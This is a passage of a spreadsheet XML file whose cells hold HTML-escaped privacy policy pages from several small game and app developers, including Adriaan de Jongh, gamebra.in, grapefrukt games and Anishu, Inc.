            &lt;/a&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#infosafe" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t xml:space="preserve">important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word !important;"&gt;9. HOW DO WE KEEP YOUR INFORMATION SAFE?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
    </t>
  </si>
  <si>
    <t>&lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;&lt;a data-custom-class="link" href="#privacyrights" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;10.</t>
  </si>
  <si>
    <t>WHAT ARE YOUR PRIVACY RIGHTS?&lt;/a&gt;&lt;/span&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#DNT" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word ! important;"&gt;11. CONTROLS FOR DO-NOT-TRACK FEATURES&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#caresidents" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word ! important;"&gt;12.</t>
  </si>
  <si>
    <t>DO CALIFORNIA RESIDENTS HAVE SPECIFIC PRIVACY RIGHTS?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;a data-custom-class="link" href="#policyupdates" style="color: rgb(48, 48, 241) ! important; word-break: break-word ! important; font-size: 15px;"&gt;
                &lt;span style="word-break: break-word !</t>
  </si>
  <si>
    <t>important;"&gt;13. DO WE MAKE UPDATES TO THIS NOTICE?&lt;/span&gt;
            &lt;/a&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;a data-custom-class="link" href="#contact" style="color: rgb(48, 48, 241) !</t>
  </si>
  <si>
    <t>important; word-break: break-word ! important; font-size: 15px;"&gt;
            &lt;span style="word-break: break-word ! important;"&gt;14.</t>
  </si>
  <si>
    <t>HOW CAN YOU CONTACT US ABOUT THIS NOTICE?&lt;/span&gt;
        &lt;/a&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;a data-custom-class="link" href="#request" style="color: rgb(48, 48, 241) ! important; word-break: break-word !</t>
  </si>
  <si>
    <t>important; font-size: 15px;"&gt;
            &lt;span style="word-break: break-word ! important;"&gt;15. HOW CAN YOU REVIEW, UPDATE, OR</t>
  </si>
  <si>
    <t xml:space="preserve">DELETE THE DATA WE COLLECT FROM YOU?&lt;/span&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;
                &lt;span&gt;
                    &lt;span&gt;
                        &lt;span&gt;
                            &lt;strong&gt;&lt;span data-custom-class="heading_1" style="font-size: 19px !important;"&gt;1. WHAT INFORMATION DO WE COLLECT?&lt;/span&gt;&lt;/strong&gt;
                        &lt;/span&gt;
                     &lt;/span&gt;
                &lt;/span&gt;
            </t>
  </si>
  <si>
    <t>&lt;/span&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div id="personalinfo"&gt;
        &lt;span data-custom-class="heading_2" style="font-size: 17px !important;"&gt;
            &lt;span style="color: rgb(0, 0, 0) ! important;"&gt;&lt;strong style="font-size: 17px !</t>
  </si>
  <si>
    <t>important;"&gt;Personal information you disclose to us&lt;/strong&gt;&lt;/span&gt;
        &lt;/span&gt;
     &lt;/div&gt;
    &lt;div&gt;
        &lt;div&gt;&lt;br /&gt;&lt;/div&gt;
        &lt;div&gt;
            &lt;span&gt;
                &lt;span&gt;
                    &lt;span data-custom-class="body_text"&gt;
                        &lt;span&gt;
                            &lt;span&gt;
                                &lt;span data-custom-class="body_text"&gt;
                                    &lt;strong&gt;&lt;em&gt;In Short:&lt;/em&gt;&lt;/strong&gt;
                                &lt;/span&gt;
                            &lt;/span&gt;
                        &lt;/span&gt;
                    &lt;/span&gt;
                    &lt;span data-custom-class="body_text"&gt;
                        &lt;span&gt;
                            &lt;span&gt;
                                &lt;span data-custom-class="body_text"&gt;
                                    &lt;strong&gt;&lt;em&gt;&amp;nbsp;&lt;/em&gt;&lt;/strong&gt;&lt;em&gt;We collect personal information that you provide to us.&lt;/em&gt;
                                &lt;/span&gt;
                            &lt;/span&gt;
                        &lt;/span&gt;
                    &lt;/span&gt;
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;
                &lt;span data-custom-class="body_text"&gt;We collect personal information that you voluntarily provide to us when you&amp;nbsp;register on the Services,&amp;nbsp;&lt;/span&gt;
                &lt;span&gt;
                    &lt;span data-custom-class="body_text"&gt;express an interest in obtaining information about us or our products and Services, when you participate in activities on the Services, or otherwise when you contact us.&lt;/span&gt;
                &lt;/span&gt;
             &lt;/span&gt;
        &lt;/span&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span&gt;
                &lt;span data-custom-class="body_text"&gt;
                    &lt;strong&gt;</t>
  </si>
  <si>
    <t>Personal Information Provided by You.&lt;/strong&gt; The personal information that we collect depends on the context of your interactions with us and the Services, the choices you make, and the products and features
                    you use. The personal information we collect may include the following:
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/span&gt;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data-custom-class="body_text"&gt;names&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;phone numbers&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;email addresses&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;usernames&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;passwords&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;contact preferences&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;contact or authentication data&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;debit/credit card numbers&lt;/span&gt;&lt;/span&gt;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data-custom-class="body_text"&gt;mailing addresses&lt;/span&gt;&lt;/span&gt;
                    &lt;/span&gt;
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/li&gt;
    &lt;/ul&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;ul
        style="
            list-style-type: square;
            font-style: normal;
            font-variant-caps: normal;
            letter-spacing: normal;
            orphans: 2;
            text-align: start;
            text-indent: 0px;
            text-transform: none;
            white-space: normal;
            widows: 2;
            word-spacing: 0px;
            -webkit-text-stroke-width: 0px;
            text-decoration-thickness: initial;
            text-decoration-style: initial;
            text-decoration-color: initial;
        "
    &gt;
        &lt;li&gt;
            &lt;span&gt;
                &lt;span&gt;
                    &lt;span data-custom-class="body_text"&gt;
                        &lt;span&gt;&lt;span data-custom-class="body_text"&gt;billing addresses&lt;/span&gt;&lt;/span&gt;
                    &lt;/span&gt;
                &lt;/span&gt;
            &lt;/span&gt;
        &lt;/li&gt;
    &lt;/ul&gt;
    &lt;div&gt;
        &lt;br /&gt;
    &lt;/div&gt;
    &lt;div&gt;
        &lt;span&gt;
            &lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Sensitive Information.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>We do not process sensitive information.&lt;/span&gt;
        &lt;/span&gt;
    &lt;</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;title&gt;Adriaan de Jongh's Privacy Policy&lt;/title&gt;
	&lt;meta name="twitter:title" content="Adriaan de Jongh's Privacy Policy"&gt;
	&lt;meta property="og:title" content="Adriaan de Jongh's Privacy Policy"&gt;
	&lt;meta name="description" content="How Adriaan de Jongh handles personal information acquired through his sites and his games. "&gt;
	&lt;meta name="twitter:description" content="How Adriaan de Jongh handles personal information acquired through his sites and his games.</t>
  </si>
  <si>
    <t>"&gt;
	&lt;meta property="og:description" content="How Adriaan de Jongh handles personal information acquired through his sites and his games. "&gt;
	&lt;meta name="twitter:card" content="summary_large_image"&gt;
	&lt;meta property="og:type" content="website"&gt;
	&lt;meta property="og:url" content="https://adriaan.games/privacy-policy"&gt;
	&lt;meta name="twitter:image" 	content="https://adriaan.games/images/Adriaan%20de%20Jongh%20-%20Social%20Media.jpg"&gt;
	&lt;meta property="og:image" 	content="https://adriaan.games/images/Adriaan%20de%20Jongh%20-%20Social%20Media.jpg"&gt;
	&lt;meta name="keywords" content="game,designer,developer,adrian,studio,company"&gt;
	&lt;link href="/style.css?v=5" rel="stylesheet"  type="text/css" media="screen"&gt;
	&lt;link rel="shortcut icon" type="image/png" href="https://adriaan.games/favicon.png"&gt;
&lt;/head&gt;
&lt;body&gt;
	&lt;main&gt;
		&lt;h1&gt;Adriaan de Jongh's Privacy Policy&lt;/h1&gt;
&lt;p&gt;Hello! I am Adriaan de Jongh.</t>
  </si>
  <si>
    <t>As a creator of games for everyone, I aim to be upfront and honest about what I do and do not collect. In short:&lt;/p&gt;
&lt;ul&gt;
	&lt;li&gt;I do not collect personal information in or through my games.&lt;/li&gt;
	&lt;li&gt;I collect your name and email address for my newsletters if you sign up.&lt;/li&gt;
	&lt;li&gt;I do not share your data with anyone else.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Data from my games&lt;/h2&gt;
&lt;p&gt;Unless otherwise specified in my game specific privacy policies, I do not collect personal information through my games. I used to collect anonymous usage statistics to help me improve my games, but in the light of the European GPDR, I decided I did not wanted to annoy my players with a consent popup, so I removed all forms of analytics from all of my games.</t>
  </si>
  <si>
    <t>I also disable and disallow the game engine and any plugins I use to create my games to collect any anonymous data.&lt;/p&gt;
&lt;h3&gt;Game specific privacy policies&lt;/h3&gt;
&lt;ul&gt;
	&lt;li&gt;Secret Shuffle - &lt;a href="https://secretshuffle.com/privacy-policy" target="_blank"&gt;https://secretshuffle.com/privacy-policy&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;wurdweb - &lt;a href="https://wurdweb.com/privacy-policy" target="_blank"&gt;https://wurdweb.com/privacy-policy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Data from newsletter signups&lt;/h2&gt;
&lt;p&gt; Whenever you sign up for any of my newsletters with your name and email address, I (securely) store that information on my server. I only use that information to send you the occasional email, and do not share your information with anyone else.</t>
  </si>
  <si>
    <t>If you wish to withdraw your consent and signup, click the unsubscribe link at the bottom of every email I send you or contact me, and I will remove all information I have of you.&lt;/p&gt;
&lt;h2&gt; Contact Adriaan&lt;/h2&gt;
&lt;p&gt;If you have any questions or concerns, please contact me by emailing me at the email address described on my website: &lt;a href="https://adriaan.games"&gt;https://adriaan.games&lt;/a&gt;.&lt;/p&gt;	&lt;/main&gt;
 &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
    &lt;html&gt;
    &lt;head&gt;
      &lt;meta charset='utf-8'&gt;
      &lt;meta name='viewport' content='width=device-width'&gt;
      &lt;title&gt;Privacy Policy&lt;/title&gt;
      &lt;style&gt; body { font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; padding:1em; } &lt;/style&gt;
    &lt;/head&gt;
    &lt;body&gt;
    &lt;h2&gt; Privacy Policy&lt;/h2&gt; &lt;p&gt;
                    gamebra.in built the hocus app as
                    a Freemium app. This SERVICE is provided by
                    gamebra.in at no cost and is intended for
                    use as is.
                  </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;
                     This page is used to inform visitors regarding
                    our policies with the collection, use, and
                    disclosure of Personal Information if anyone decided to use
                    our Service.
                   &lt;/p&gt; &lt;p&gt;
                    If you choose to use our Service, then you agree
                    to the collection and use of information in relation to this
                    policy.</t>
  </si>
  <si>
    <t xml:space="preserve">The Personal Information that we collect is
                    used for providing and improving the Service.
                     We will not use or share your
                    information with anyone except as described in this Privacy
                    Policy.
                   &lt;/p&gt; &lt;p&gt;
                    </t>
  </si>
  <si>
    <t>The terms used in this Privacy Policy have the same meanings
                    as in our Terms and Conditions, which is accessible at
                    hocus unless otherwise defined in this Privacy
                    Policy.
                   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Information Collection and Use&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                     For a better experience, while using our Service,
                    we may require you to provide us with certain
                    personally identifiable information.</t>
  </si>
  <si>
    <t xml:space="preserve">The
                    information that we request will be
                    retained by us and used as described in this privacy policy.
                   &lt;/p&gt; &lt;p&gt;
                     The app does use third party services that may collect
                    information used to identify you.
                  </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;div&gt;&lt;p&gt;
                      Link to privacy policy of third party service providers
                      used by the app
                    &lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a href="https://www.google.com/policies/privacy/" target="_blank"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;!----&gt;&lt;/ul&gt;&lt;/div&gt; &lt;p&gt;&lt;strong&gt;Log Data&lt;/strong&gt;&lt;/p &gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;
                     We want to inform you that whenever
                    you use our Service, in a case of an error in the
                    app we collect data and information (through third
                    party products) on your phone called Log Data. This Log Data
                    may include information such as your device Internet
                    Protocol (“IP”) address, device name, operating system
                    version, the configuration of the app when utilizing
                    our Service, the time and date of your use of the
                    Service, and other statistics.
                  </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                    Cookies are files with a small amount of data that are
                    commonly used as anonymous unique identifiers. These are
                    sent to your browser from the websites that you visit and
                    are stored on your device's internal memory.
                   &lt;/p&gt; &lt;p&gt;
                    </t>
  </si>
  <si>
    <t>This Service does not use these “cookies” explicitly.
                     However, the app may use third party code and libraries that
                    use “cookies” to collect information and improve their
                    services. You have the option to either accept or refuse
                    these cookies and know when a cookie is being sent to your
                    device.</t>
  </si>
  <si>
    <t xml:space="preserve">If you choose to refuse our cookies, you may not be
                    able to use some portions of this Service.
                   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Service Providers&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                    We may employ third-party companies
                    and individuals due to the following reasons:
                  &lt;/p&gt; &lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt; &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt; &lt;li&gt;To perform Service-related services; or&lt;/li&gt; &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;
                    </t>
  </si>
  <si>
    <t xml:space="preserve">We want to inform users of this
                    Service that these third parties have access to your
                    Personal Information. The reason is to perform the tasks
                    assigned to them on our behalf. However, they are obligated
                    not to disclose or use the information for any other
                    purpose.
                  </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                     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t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Links to Other Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                     This Service may contain links to other sites. If you click
                    on a third-party link, you will be directed to that site.
                    </t>
  </si>
  <si>
    <t xml:space="preserve">Note that these external sites are not operated by
                    us. Therefore, we strongly advise you to
                    review the Privacy Policy of these websites.
                     We have no control over and assume no
                    responsibility for the content, privacy policies, or
                    practices of any third-party sites or services.
                  </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Children’s Privacy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                    These Services do not address anyone under the age of 6.
                     We do not knowingly collect personally
                    identifiable information from children under 6. In the case
                    we discover that a child under 6 has provided
                    us with personal information,
                    we immediately delete this from our servers.</t>
  </si>
  <si>
    <t xml:space="preserve">If you
                    are a parent or guardian and you are aware that your child
                    has provided us with personal information, please contact
                    us so that we will be able to do
                    necessary actions.
                   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                    </t>
  </si>
  <si>
    <t>We may update our Privacy Policy from
                    time to time. Thus, you are advised to review this page
                    periodically for any changes. We will
                    notify you of any changes by posting the new Privacy Policy
                    on this page.</t>
  </si>
  <si>
    <t xml:space="preserve">These changes are effective immediately after
                    they are posted on this page.
                   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
                    If you have any questions or suggestions about
                    our Privacy Policy, do not hesitate to contact
                    us at info@gamebra.in.
                   &lt;/p&gt; &lt;p&gt;
    &lt;/body&gt;
    &lt;/html&gt;
      </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;meta http-equiv="content-type" content="text/html;charset=UTF-8" /&gt;
&lt;head&gt;
  &lt;!-- Basic Page Needs
  –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;title&gt;privacy policy &amp;#8211; grapefrukt games&lt;/title&gt;
  &lt;meta name="description" content=""&gt;
  &lt;meta name="author" content=""&gt;
  &lt;!-- Mobile Specific Metas
  –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>FONT
  –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
  &lt;link href='.. /cssa754.css?family=Roboto+Condensed:300' rel='stylesheet' type='text/css'&gt;
  &lt;!-- CSS
  –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
  &lt;link rel="stylesheet" href=".. /wp-content/themes/grapefrukt2015/css/normalize.css"&gt;
  &lt;link rel="stylesheet" href="../wp-content/themes/grapefrukt2015/css/skeleton.css"&gt;
  &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Favicon
  –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
  &lt;link rel="icon" type="image/png" href="../wp-content/themes/grapefrukt2015/images/favicon.png"&gt;
&lt;/head&gt;
&lt;body class="post-template-default single single-post postid-20 single-format-standard"&gt;
&lt;div class="container"&gt;
&lt;div id="header" class="row"&gt;
  &lt;a class="logo six columns" href="../index.html "&gt;
    &lt;h1&gt;grapefrukt games&lt;/h1&gt;
  &lt;/a&gt;
  &lt;p class="intro six columns"&gt;
    My name is Martin Jonasson. 
     You can probably find me on &lt;a href="https://twitter.com/grapefrukt/"&gt;Twitter&lt;/a&gt; or more 
    info in my &lt;a href="http://presskit.grapefrukt.com/"&gt;presskit&lt;/a&gt;.
    </t>
  </si>
  <si>
    <t>I've been making games for fifteen years and these are some of them. 
   &lt;/p&gt;
&lt;/div&gt;
&lt;div id="content" class="narrowcolumn" role="main"&gt;
&lt;div class="row"&gt;
	&lt;div class="about twelve columns"&gt;
		&lt;p&gt;
			&lt;h5&gt;grapefrukt games privacy policy&lt;/h5&gt;
&lt;p&gt; We all just want to play games and have fun, preferably without being spied on.</t>
  </si>
  <si>
    <t>My games collect a little bit of data if your game encounters an issue. This policy clarifies how and why that happens.&lt;/p&gt;
&lt;h5&gt;Data Collected&lt;/h5&gt;
&lt;p&gt;Should your game crash a report will be sent to Unity who will then process and anonymize this data. I can see where in the code the issue occured and on what kind of device this happened.</t>
  </si>
  <si>
    <t>No user-identifyable data is kept. &lt;/p&gt;
&lt;p&gt;You will note that our games require no special permissions or access to any personal data of any kind.&lt;/p&gt;
&lt;h5&gt; What happens to the data&lt;/h5&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Your data is stored by Unity and consumed by me in aggregate form.&lt;/p&gt;
 &lt;h5&gt;Sharing of data&lt;/h5&gt;
&lt;p&gt;Due to this data being collected by a third party (Unity) they obviously have access as well. We will not share your data to any third party unless required to do so by law or regulation (which is very unlikely).&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Document
  –––––––––––––––––––––––––––––––––––––––––––––––––– --&gt;
&lt;/div&gt; &lt;!-- end row --&gt;
&lt;/div&gt; &lt;!-- end container --&gt;
&lt;script src="../wp-content/themes/grapefrukt2015/js/scripts.js" type="text/javascript"&gt;&lt;/script&gt;	
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
	&lt;!-- Title here --&gt;_x005F_x000D_
	&lt;title&gt;Anishu, Inc.&lt;/title&gt;_x005F_x000D_
	&lt;!-- Description, Keywords and Author --&gt;_x005F_x000D_
	&lt;meta name="description" content="Your description"&gt;_x005F_x000D_
	&lt;meta name="keywords" content="Your,Keywords"&gt;_x005F_x000D_
	&lt;meta name="author" content="ResponsiveWebInc"&gt;_x005F_x000D_
_x005F_x000D_
	&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!-- Fonts --&gt;_x005F_x000D_
	&lt;link href='http://fonts.googleapis.com/css?family=Open+Sans:400italic,400,600' rel='stylesheet' type='text/css'&gt;_x005F_x000D_
	&lt;link href='http://fonts.googleapis.com/css?family=Open+Sans+Condensed:300,700' rel='stylesheet' type='text/css'&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!--</t>
  </si>
  <si>
    <t>Styles --&gt;_x005F_x000D_
	&lt;!-- Bootstrap CSS --&gt;_x005F_x000D_
	&lt;link href="css/bootstrap.min.css" rel="stylesheet"&gt;_x005F_x000D_
	&lt;!-- Font awesome CSS --&gt;_x005F_x000D_
	&lt;link href="css/font-awesome.min.css" rel="stylesheet"&gt;	_x005F_x000D_
	&lt;!--</t>
  </si>
  <si>
    <t>Pretty Photo --&gt;_x005F_x000D_
	&lt;link href="css/prettyPhoto.css" rel="stylesheet"&gt;_x005F_x000D_
	&lt;!-- Animation CSS --&gt;_x005F_x000D_
	&lt;link href="css/animate.min.css" rel="stylesheet" &gt;_x005F_x000D_
	&lt;!-- Custom CSS --&gt;_x005F_x000D_
	&lt;link href="css/style.css" rel="stylesheet"&gt;_x005F_x000D_
	&lt;!--</t>
  </si>
  <si>
    <t>Favicon --&gt;_x005F_x000D_
	&lt;link rel="shortcut icon" href="#"&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body&gt;_x005F_x000D_
	&lt;!-- Navigation Bar Starts --&gt;_x005F_x000D_
	&lt;div class="head-bar"&gt;_x005F_x000D_
		&lt;div class="container"&gt;_x005F_x000D_
			&lt;div class="row"&gt;_x005F_x000D_
				&lt;div class="col-md-3 col-sm-3"&gt;_x005F_x000D_
					&lt;div class="head-brand"&gt;_x005F_x000D_
						&lt;a href="index.html" &gt;&lt;div style="color: #0099dd"&gt;anishu&lt;/div&gt;&lt;/a&gt;_x005F_x000D_
					&lt;/div&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;div class="col-md-9 col-sm-9"&gt;_x005F_x000D_
					&lt;!-- Navigation List Starts --&gt;_x005F_x000D_
					&lt;div class="navigation-bar pull-right"&gt;_x005F_x000D_
                                                &lt;ul class="list-inline"&gt;_x005F_x000D_
                                                        &lt;li&gt;&lt;a href="index.html"&gt;Finances&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                        &lt;</t>
  </si>
  <si>
    <t>li&gt;&lt;a href="homebudget.html"&gt;HomeBudget&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                        &lt;li&gt;&lt;a href="miles.html"&gt;Mileage Logs&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                        &lt;li&gt;&lt;a href="bizexpense.html"&gt;BizExpense&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                        &lt;li&gt;&lt;a href="debtstrategy.html"&gt;Debt Strategy&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                        &lt;li&gt;&lt;a href="contact.html"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                                &lt;/ul&gt; _x005F_x000D_
					&lt;/div&gt;_x005F_x000D_
					&lt;div class="clearfix"&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
					&lt;div class="nav-icon"&gt;_x005F_x000D_
						&lt;a href="#"&gt;&lt;i class="fa fa-bars"&gt;&lt;/i&gt;&lt;/a&gt;_x005F_x000D_
					&lt;/div&gt;_x005F_x000D_
					&lt;!-- Navigation List Ends--&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	&lt;span class="home"&gt;&lt;/span&gt;_x005F_x000D_
	&lt;!-- Navigation bar Ends --&gt;_x005F_x000D_
&lt;div id="wrap"&gt;_x005F_x000D_
	&lt;!-- Robin header --&gt;_x005F_x000D_
			&lt;div class="contact-us block"&gt;_x005F_x000D_
			&lt;div class="container"&gt;_x005F_x000D_
							&lt;div class="row"&gt;_x005F_x000D_
							&lt;div class="col-md-10 col-md-offset-1 col-sm-10 col-sm-offset-1"&gt;_x005F_x000D_
								&lt;br/&gt;&lt;br/&gt;_x005F_x000D_
								&lt;div class="contact-form standard-blue" style="color:lightgray"&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal align=center style='text-align:center'&gt;&lt;h2 align=center&gt;PRIVACY POLICY&lt;/h2&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:0in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;This privacy policy governs your use of the_x005F_x000D_
software applications ("Application") created by&amp;nbsp;Anishu, Inc._x005F_x000D_
&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h4 style='margin-top:15.95pt;margin-right:0in;margin-bottom:15.95pt;_x005F_x000D_
margin-left:0in;page-break-after:auto'&gt;&lt;span style='mso-ansi-language:#0400;_x005F_x000D_
mso-fareast-language:#0400;mso-bidi-language:#0400'&gt;What information does the_x005F_x000D_
Application obtain and how is it used?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h4&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in'&gt;&lt;b&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;User Provided Information&lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='mso-ansi-language:#0400;mso-fareast-language:#0400;mso-bidi-language:_x005F_x000D_
#0400'&gt;&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;We collect the information that you directly_x005F_x000D_
provide to us.</t>
  </si>
  <si>
    <t>When you contact us for support, either directly via email or_x005F_x000D_
via the Troubleshooting section of the application, the information we collect_x005F_x000D_
includes your name, email address, and any other troubleshooting information_x005F_x000D_
that you provide to us.&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in'&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
#0400;mso-bidi-language:#0400'&gt;We may use the information you provided us to_x005F_x000D_
contact you from time to time to provide you with important information that_x005F_x000D_
help with the usage of the application.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-top:12.0pt;margin-right:0in;margin-bottom:_x005F_x000D_
12.0pt;margin-left:.5in'&gt;&lt;b&gt;&lt;span style='mso-ansi-language:#0400;mso-fareast-language:_x005F_x000D_
